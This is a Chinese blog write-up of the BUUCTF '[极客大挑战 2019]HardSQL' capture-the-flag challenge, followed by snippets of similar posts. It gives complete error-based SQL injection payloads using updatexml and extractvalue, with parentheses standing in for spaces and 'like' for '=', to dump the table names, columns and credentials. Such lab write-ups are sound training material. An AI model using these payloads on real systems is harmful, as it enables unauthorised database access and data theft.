Buuctf-[极客大挑战 2019]HardSQL

最新推荐文章于 2024-05-04 17:16:12 发布
最新推荐文章于 2024-05-04 17:16:12 发布
阅读量271 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63563528/article/details/130126683
版权

看题:

 

一路做到这里我们对这个题已经很熟悉了,我还是按照习惯,在密码栏注:

用户名:admin

密码:1'

我们知道,出现这个说明闭合成功了,但是之后发现它过滤了好多字符和语句,我输入

1' or 1=1#它回显:

空格被过滤了 ,怎样绕过呢?()绕过:

括号是来包含子查询的,任何可以计算出结果的语句都可以用括号围起来,而括号的两端,可以没有多余的空格

我来试一下:输入1'(or)#

发现绕过成功了,接下来可以构造查询了,需要注意的是,等号=是被过滤了,但是like可以平替:

首先,数据库查询:

1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

报错注入回显嘛,直接获取数据库名“geek”

接下来,查询数据表:

1'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#

查询表内列名:

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

id,username,password。看到这些,已经基本胜利了:

接着查询username和password中的内容:

1'or(updatexml(1,concat(0x7e,(select(group_concat(id,'~',username,'~',password))from(H4rDsq1)),0x7e),1))#

看到没,flag已经出现,但是显示不全:flag{f166c87a-0f0e-4498-,要使用到right语句:

1'or(updatexml(1,concat(0x7e,(select(right(password,21))from(H4rDsq1)),0x7e),1))#

 又得到了:98-8e23-3728c2f96a1d}

 

拼接一下flag,把重复部分删咯,就可以成功提交。 下面贴上笔记:

 

7ig3r
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF——[挑战 2019]HardSQL
doraemon12345的博客
06-01 227
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
[挑战 2019]HardSQL -wp
freerats的博客
07-04 671
直接找注入,随便填写用户名密码,用户名处多加个引号,有报错 加个or 1 # 有过滤,抓个包fuzz一下 等号,空格等被过滤 发现可以用报错注入,空格可以用括号代替 username=admin'or(extractvalue(1,concat('0x7e',version())))%23 username=admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table
[挑战 2019]HardSQL
pakho_C的博客
02-08 2392
web第24题 [挑战 2019]HardSQL 打开靶场 首先尝试使用单引号 显然页面存在sql注入的 永真式进行登陆 继续尝试order by爆字段 那么说明很多字符都被过滤了 尝试双写进行绕过 依旧是不行 看了很多人的wp,他们都没说清楚如何知道对哪些关键字进行了过滤,直接给出了,我也不知道怎么来的 直接使用burpsuite对其进行fuzz,观察过滤了哪些关键字 参考:利用burpsuit对xss和sql注入进行fuzz 抓包发送至intruder模块 设置payload,
[挑战 2019]HardSQL 1
最新发布
qq_44724114的博客
05-04 510
右键选择send to intruder——选择爆破点(这里我只选了password为爆破点)选择已经准备好的字典,下面的字典不全,但也勉强能用。我这里Length 如果是784的就不能跑 799的可以;具体的可以看Response的提示来判断。
BUUCTF [挑战 2019]HardSQL
CrotZZ的博客
07-08 206
尝试万能密码被逮住 1’ or 1=1# 经过一系列尝试 order by,union select之类的都被过滤 网上别人的write参考了一下,这里是报错注入,用到xpath语法错误中extractvalue ^表异或,这里or and都被过滤了包括替换成&& ||我也试过也不行。 网上了解了下报错注入,这题目extractvalue里select后要加括号(比如下面database()外面加了括号),而正常情况下是不用的,猜测是空格被过滤的原因。 check.php?username
BUUCTF之HardSQL[挑战 2019]
金 帛的博客
06-06 1318
buucft记录贴
buuctf-[挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3023
buuctf-[挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
微信小程序-学院.zip
04-14
你可以使用双大括号`{{ }}`将变量插入到WXML中,而这些变量的值是在JS中动态更新的。 3. **网络请求**:微信小程序提供了wx.request接口,用于向服务器发送HTTP请求,获取在线小说的数据。 4. **组件化开发**:...
标记:标记-标记系统
02-03
标记-标记系统 设置服务器 npm install -g gitinspector npm install -g eslint npm install nano --save npm install couch-admin --save npm install pouchdb --save npm install --save pouchdb-find npm...
微信小程序-- 学院
04-02
在这个“微信小程序-- 学院”资源中,我们可以期待学习到关于如何利用微信小程序平台进行开发的专业知识。 1. 微信小程序基础: 微信小程序的基础包括了它的架构、生命周期和API。学习者需要理解小程序的XML和...
微信小程序实验源码-学院 v1.0
12-02
微信小程序实验源码-学院是以wxml进行开发的微信小程序源码。 它实现文章列表,文章详情等功能,特色: - 实现右侧菜单栏 - 实现显示markdown内容 数据接口: 使用本地数据接口 目录结构: - image 存放项目图片...
与团队-与团队1
08-03
与团队》这本书由Brian W. Fitzpatrick和Ben Collins-Sussman共同撰写,两位作者来自Google,具有丰富的项目开发和管理经验,特别是在Subversion的开发中扮演了重要角色。这本书聚焦于软件开发中的非技术因素...
【CTF】BUUCTFCrypto 部分题解(持续更新)
Rm_mR的博客
04-25 1253
【CTF】Buuctf Crypto 部分题解(持续更新)
非常经典的一道SQL报错注入题目[挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 1436
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
【pwn】2022 挑战
woodwhale的博客
11-22 1529
2022 挑战 pwn题解
[BUUCTF]HardSQL(writeup)
weixin_63306244的博客
06-22 138
这是因为extractvalue函数限制了一次字符串只能输出32位。所以就用常用的" like "和" () "来绕过。发现select、ascii、空格、=等被过滤。输入admin / 2'or'1。使用bp试试看过滤了哪些东西。因为“=”、“空格”被过滤了。sql注入题进入后直接惯例。就确定了需要用报错注入来做。由此类推下去得到下一句语句。他只给了你前半段的flag。得到数据库名后构造下一句。这是为什么,那该怎么办呢。但是当你输入后会发现。再加上之前页面的报错。
buuctf-HardSQL
m0_62094846的博客
04-02 1398
这道题过滤了很多sql注入的关键词(可以用bp,fuzz出来,下次试试) 包括空格,但是没有过滤报错注入的两个关键词updatexml和extractvalue 用报错注入 查库名(geek) ?username=1'or(updatexml(1,concat(0x7e,(database()),0x7e),1))%23&password=1 查找所有数据库 ?username=admin'or(updatexml(1,concat(0x7e,(select(grou...
buuctf web 挑战2019
08-24
对于BUUCTF Web挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值